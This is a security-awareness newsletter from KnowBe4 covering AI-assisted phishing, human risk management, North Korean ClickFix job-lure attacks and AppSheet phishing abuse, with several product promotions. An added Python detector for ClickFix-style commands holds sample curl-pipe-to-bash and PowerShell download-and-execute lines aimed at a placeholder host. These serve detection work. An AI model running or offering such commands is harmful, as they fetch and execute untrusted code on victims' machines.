CyberheistNews Vol 15 #38 Why Does Protecting AI Agents Need To Be Status Quo?


Cyberheist News


CyberheistNews Vol 15 #38 | September 23rd, 2025


Why Does Protecting AI Agents Need To Be Status Quo?

By Roger Grimes

Protecting humans means protecting the tools humans use.

Human risk management (HRM) means reducing human-based risk, or in our particular area, human-based cybersecurity risk. Study after study has shown that, in one way or another, humans are involved in the vast majority of cybersecurity incidents.

Sometimes it is humans being tricked into making faulty security decisions by social engineering. Other times, it is humans making faulty choices that end up weakening security protections, or accidentally sending confidential information to the wrong people.

Human risk even involves maliciously-minded employees who do not have their employer’s best interests at heart — insider threat. There are myriad ways that humans are involved in making decisions and performing actions that result in cyber compromises.

Much of HRM involves training: training in how to recognize, mitigate and report threats (i.e., security awareness training), coaching in how to make better security decisions, and education in how to securely configure systems.

Of course, using cybersecurity tools and products to prevent threats from getting to users, where they have to make critical security decisions in the first place, is even better. KnowBe4 and its products are directly involved in all of that.

[CONTINUED] Blog post with links:
https://blog.knowbe4.com/protecting-ai-agents-will-be-status-quo

[Live Demo] Intelligent Email Defense: Automate, Remediate and Train from One Platform

As cyber attackers continue to outpace traditional defenses, it’s not a question of if, but when sophisticated attacks will bypass your email security controls.

Phishing attacks are surging at an unprecedented 1,265% rate since 2022, largely driven by AI advancements. Most concerning, 31% of IT teams take more than five hours to respond to reported security issues, leaving your organization vulnerable during those critical hours when threats remain active in your users’ inboxes.

During this demo, you’ll discover how PhishER Plus can help take control back from rising AI phishing risks by:

  • Transforming your users into active threat sensors with one-click reporting via the Phish Alert Button
  • Accelerating response times with AI-powered automation that reduces manual email review by 85-99%
  • Providing comprehensive threat intelligence from a network of 13+ million global users and third-party integrations
  • Removing threats automatically from all mailboxes with PhishRIP before users can interact with them
  • Converting real attacks into targeted training opportunities with PhishFlip

Discover how PhishER Plus combines AI and human intelligence to transform your users from security risks into your most valuable defenders.

Date/Time: TOMORROW, Wednesday, September 24 @ 2:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/phisher-demo-3?partnerref=CHN2

AI-Assisted Phishing Attacks Are an Increasingly Serious Threat

AI-assisted phishing attacks pose a significant and increasing threat to organizations, according to Matt Weidman, partner and vice president of Commercial Property & Casualty at USIA.

In an article for CBIA, Weidman explains that attackers can use AI tools to craft targeted, convincing phishing messages that are almost indistinguishable from the real thing.

“Personalization and social engineering: AI can analyze vast datasets, including social media posts, websites, and public records, to craft highly tailored messages,” Weidman says. “It can be trained to mimic writing styles to appear authentic, reference specific details (e.g., recent purchases, ongoing projects) to seem legitimate, and even clone the voice of business leaders or generate realistic videos to make fraudulent yet convincing messages.”

In addition to improving the content of the phishing messages, AI can help attackers substantially increase output on a massive scale.

“Because AI can increase cybercriminals’ output volume and enhance the sophistication of their tactics, employees may encounter multiple fraudulent messages on a daily basis,” Weidman says. “The combination of frequent attempts and convincingly crafted messages may increase the likelihood that a business will fall victim to one of these scams.”

Security awareness training gives organizations an essential layer of defense against these attacks. “Staff should receive ongoing security awareness training that teaches them about the latest cybersecurity threats and hackers’ newest tactics,” Weidman says.

“Businesses should conduct phishing simulations to help employees recognize and respond effectively to fraudulent communications. Employees should feel empowered to verify requests for sensitive information before responding to them, especially those involving financial transactions or credential sharing, and they should be encouraged to report suspicious activities.”

KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.

Blog post with links:
https://blog.knowbe4.com/ai-assisted-phishing-attacks-are-an-increasingly-serious-threat

[Live Demo] Ridiculously Easy AI-Powered Security Awareness Training and Phishing

Phishing and social engineering remain the #1 cyber threat to your organization, with 68% of data breaches caused by human error. Your security team needs an easy way to deliver personalized training. This is precisely what our AI Defense Agents provide.

Join us for a demo showcasing KnowBe4’s leading-edge approach to human risk management with agentic AI that delivers personalized, relevant and adaptive security awareness training with minimal admin effort.

See how easy it is to train and phish your users with KnowBe4’s HRM+ platform:

  • SmartRisk Agent™ – Generate actionable data and metrics to help you lower your organization’s human risk score
  • Template Generator Agent – Create convincing phishing simulations, including Callback Phishing, that mimic real threats. The Recommended Landing Pages Agent then suggests appropriate landing pages based on AI-generated templates
  • Automated Training Agent – Automatically identify high-risk users and assign personalized training
  • Knowledge Refresher Agent and Policy Quizzes Agent – Reinforce your security program and organizational policies.
  • Enhanced Executive Reports – Track user activities, visualize trends, download widgets, and improve searching/sorting to provide deeper insights and streamline collaboration

See how these powerful AI-driven features work together to dramatically reduce your organization’s risk while saving your team valuable time.

Date/Time: Wednesday, October 1 @ 2:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/kmsat-demo-1?partnerref=CHN

North Korean Hackers Target Job Seekers With ClickFix Attacks

North Korean hackers behind the “Contagious Interview” campaign are using the ClickFix social engineering tactic to target job seekers with phony employment offers, according to researchers at SentinelOne.

“ClickFix typically proceeds as follows,” the researchers explain. “A targeted job seeker receives an invitation to participate in a job application process, directing them to a lure website where they are prompted to complete a skill assessment.

“During the assessment, the applicant encounters a fabricated error message, such as a camera access issue. They are then instructed to copy and paste command lines, often involving utilities like curl, to download and execute a supposed update from a separate malware distribution server, unknowingly deploying malware in the process.”

The attackers are primarily targeting marketing and finance employees at cryptocurrency companies, using “lures involving various job positions, such as Portfolio Manager, Investment Manager, and Senior Product Manager, across a range of impersonated companies including Archblock, Robinhood, and eToro.”

The attackers frequently rotate their infrastructure to stay ahead of defenders, setting up new domains to avoid detection.

“Given the continuous success of the campaign in engaging job applicants, the threat actors may be prioritizing maintaining operational readiness and meeting their objectives by rapidly deploying new assets to replace disrupted infrastructure, rather than undertaking large-scale targeted changes,” the researchers write.

“We observed a high rate of new infrastructure deployment by the Contagious Interview threat actors alongside losses of existing infrastructure due to actions by service providers, which supports this assessment.”

The researchers conclude, “[A] critical element in mitigating this threat is the human factor. It is important that job seekers, particularly those within the cryptocurrency sector, exercise heightened vigilance when engaging with employment offers and associated assessments.”

Blog post with links:
https://blog.knowbe4.com/north-korean-hackers-target-job-seekers-with-clickfix-attacks
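As an added example (not from the SentinelOne report or from KnowBe4), the detection logic below runs over constructed process-creation events and flags the shape of the pasted "fix" described above: a command line that both fetches a URL with a download utility and executes the result in the same one-liner, with extra weight when it was launched from an interactive parent such as the Run dialog or a terminal. The parent-process names, the stand-in download utilities other than curl, and the sample events are assumptions.

```python
import re
from typing import Dict, List

# Download utilities a ClickFix lure tells the victim to paste. curl is named in the
# SentinelOne write-up; the others are common stand-ins (assumption).
DOWNLOADER = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|certutil(?:\.exe)?\s+-urlcache)\b", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)
# The fetched payload is run in the same one-liner: piped into a shell, chained
# with && or ;, or evaluated with iex / Invoke-Expression.
EXEC_CHAIN = re.compile(
    r"(\|\s*(?:sh|bash|zsh|python3?)\b|&&|;\s*(?:sh|bash|chmod|open)\b|\biex\b|Invoke-Expression)", re.I)
# Parents that mean a person typed or pasted the command (assumed names).
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2", "chrome.exe", "msedge.exe", "firefox.exe", "safari"}

# Constructed sample events (not real telemetry), in the shape an EDR or Sysmon
# Event ID 1 record would give: parent image and full child command line.
SAMPLE_EVENTS = [
    {"id": "e1", "parent": "Terminal",
     "cmd": "curl -fsSL https://update.example.invalid/camera-fix.sh | bash"},
    {"id": "e2", "parent": "explorer.exe",
     "cmd": 'powershell -w hidden -c "iwr http://update.example.invalid/fix.ps1 | iex"'},
    {"id": "e3", "parent": "Terminal", "cmd": "curl -I https://example.com/"},   # plain fetch, benign
    {"id": "e4", "parent": "services.exe", "cmd": "apt-get update && apt-get upgrade -y"},  # chain, no URL
]


def clickfix_reasons(event: Dict[str, str]) -> List[str]:
    """Return why an event looks like a pasted download-and-execute one-liner, or [] if it does not."""
    cmd = event.get("cmd", "")
    has_download = bool(DOWNLOADER.search(cmd) and URL.search(cmd))
    has_exec = bool(EXEC_CHAIN.search(cmd))
    if not (has_download and has_exec):
        return []  # a lone fetch or a lone && chain is ordinary admin activity
    reasons = ["download from URL", "executed in same command"]
    if event.get("parent", "").lower() in INTERACTIVE_PARENTS:
        reasons.append(f"launched from interactive parent {event['parent']}")
    return reasons


def find_clickfix(events: List[Dict[str, str]]) -> List[tuple]:
    """Return (event id, reasons) for every event that matches the download-and-execute pattern."""
    return [(e["id"], clickfix_reasons(e)) for e in events if clickfix_reasons(e)]


if __name__ == "__main__":
    for event_id, why in find_clickfix(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(why))
```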

A Strategic Framework for Human Risk Management: What is HRM and Why Do Organizations Need It?

Cybersecurity isn’t just about technology. The human element remains a primary factor in 68% to 90% of security breaches. But this isn’t a time to point fingers at your users.

In reality, users make mistakes. Even when they understand cyber attack dangers, they may not have time to fully process them. Meanwhile, AI-amplified social engineering attacks make attacks more deliverable and that much harder to spot.

How can you expect your employees to detect attacks when traditional detection technology cannot? This leaves your organization with a critical strategic gap in your security posture. And what better to bridge the gap with than human risk management (HRM)—a strategy that moves beyond simple awareness to systematically identify, measure, and mitigate human-derived risk through a continuous, data-driven process.

Download this whitepaper to:

  • Discover the core principles of modern HRM
  • Learn how to implement the DEEP model (Defend, Educate, Empower, and Protect)
  • Discover why the adoption of an integrated, AI-driven HRM platform is the most effective means of engaging employees
  • Build robust security cultures using proven principles of organizational behavior

Don’t let human risk remain your biggest security blind spot. Download the whitepaper and get the proven framework for systematic human risk management.

Download Now:
https://info.knowbe4.com/strategic-framework-human-risk-management-wp-em

Quotes of the Week

“In the end we retain from our studies only that which we practically apply.”
– Johann Wolfgang von Goethe – Poet (1749-1832)


“The great aim of education is not knowledge but action.”
– Herbert Spencer – Philosopher (1820–1903)


Thanks for reading CyberheistNews

You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-15-38-why-does-protecting-ai-agents-need-to-be-status-quo

Security News

Report: SMBs Face Surge in Cyberattacks Assisted by AI Tools

Cyberattacks against small and medium-sized businesses (SMBs) nearly doubled in the first half of 2025, according to a new report from Guardz.

“Phishing remains the most prevalent initial attack vector in breaches, accounting for roughly one-fifth of incidents. SMBs are particularly vulnerable due to limited security training and high trust within small teams. However, generic phishing attacks have declined as attackers increasingly use stolen credentials to gain access quietly. Phishing is becoming more targeted and sophisticated.”

The researchers also observed a significant increase in business email compromise (BEC), often assisted by generative AI tools.

“[BEC] scams surged against SMBs, causing significant financial losses globally,” the report says. “BEC attackers impersonate trusted parties to request fraudulent payments or sensitive data. Employees at small businesses face significantly more social engineering attacks than those at larger companies.

Generative AI is a game-changer, enabling cybercriminals to craft polished, personalized scam emails and deepfake voice impersonations. This technology increases the scale and believability of attacks, making detection harder.

SMBs are responding by increasing security awareness efforts, but gaps remain. Phishing in 2025 remains a shape-shifting threat, still the most common attack vector, but increasingly more complex to detect.”

The researchers also observed an increase in ransomware attacks, noting that small businesses are particularly vulnerable to downtime. “A few top ransomware gangs are responsible for almost half of all reported attacks, reflecting a concentrated ecosystem,” Guardz warns.

“Attackers perceive SMBs as having weaker defenses and limited incident response capabilities, making them easier targets. Many SMB victims lack robust data backups or redundant systems, increasing pressure to pay ransoms.”

Guardz has the story:
https://guardz.com/blog/small-business-cyberattacks-rise-in-2025-guardz-mid-year-findings/

Attackers Abuse Google’s AppSheet to Send Phishing Emails

Hackread reports that attackers are abusing Google’s AppSheet platform to send phishing emails. The campaign was spotted by researchers at Raven, who warn that attackers are sending messages that impersonate AppSheet, informing users of phony trademark violations.

Notably, the emails are sent from AppSheet’s legitimate infrastructure, making them more likely to bypass security controls and appear legitimate to human recipients.

“As a Google Cloud service, AppSheet inherits the trust and reputation that organizations place in Google’s infrastructure,” the researchers write. “When employees see ‘appsheet.com’ in their inbox, they naturally associate it with the same security standards they expect from Gmail or Google Drive.

With millions of business users building applications on the platform, AppSheet communications are common in corporate environments, making malicious emails appear routine.”

Attackers have abused AppSheet for this purpose since at least March 2025, accounting for a notable share of global phishing emails. Attackers are always looking for ways to slip past security filters and are increasingly abusing legitimate platforms to evade detection.

“This AppSheet campaign represents a broader trend of legitimate service abuse,” the researchers explain. “Attackers are discovering they can achieve better results by using trusted platforms rather than building their own infrastructure.”

Erich Kron, security awareness advocate at KnowBe4, told Hackread in a statement, “The reliance on commonly used or well-known brands in social engineering attacks is nothing new; however, these attacks still remain quite effective.

These types of attacks are meant to blend in with normal day-to-day activities, further increasing the trust level of the potential victim.” New-school security awareness training can give your organization an essential layer of defense by teaching your employees to recognize red flags associated with social engineering attacks.

Hackread has the story:
https://hackread.com/google-appsheet-phishing-scam-fake-trademark-notices/

What KnowBe4 Customers Say

“It’s genuinely hard to believe that this email is actually from the CEO of the company. However, on the off chance that it truly is you, I wanted to share some feedback regarding our experience with KnowBe4.

We’ve been very pleased with the platform. As an important point, prior to making our purchase, we were evaluating three competitors. Ultimately, we chose to contract with KnowBe4 primarily because your sales process was exceptionally responsive and straightforward.

A very friendly individual quickly answered our questions, we coordinated a meeting where the tool was clearly explained, and we were even given a 30-day trial period to experiment with it. The entire experience felt very easy and fluid.

This stands in stark contrast to the other two competitors we considered. It’s almost unbelievable, but they didn’t respond quickly – and by “quickly,” I’m not referring to a matter of hours, but rather one or two days. On top of that, they didn’t offer a trial, and their sales representatives didn’t come across as particularly friendly.

In summary, congratulations on having such an excellent sales process!

– C.F., Head of Security

The 10 Interesting News Items This Week

Cyberheist ‘Fave’ Links

This Week’s Links We Like, Tips, Hints and Fun Stuff
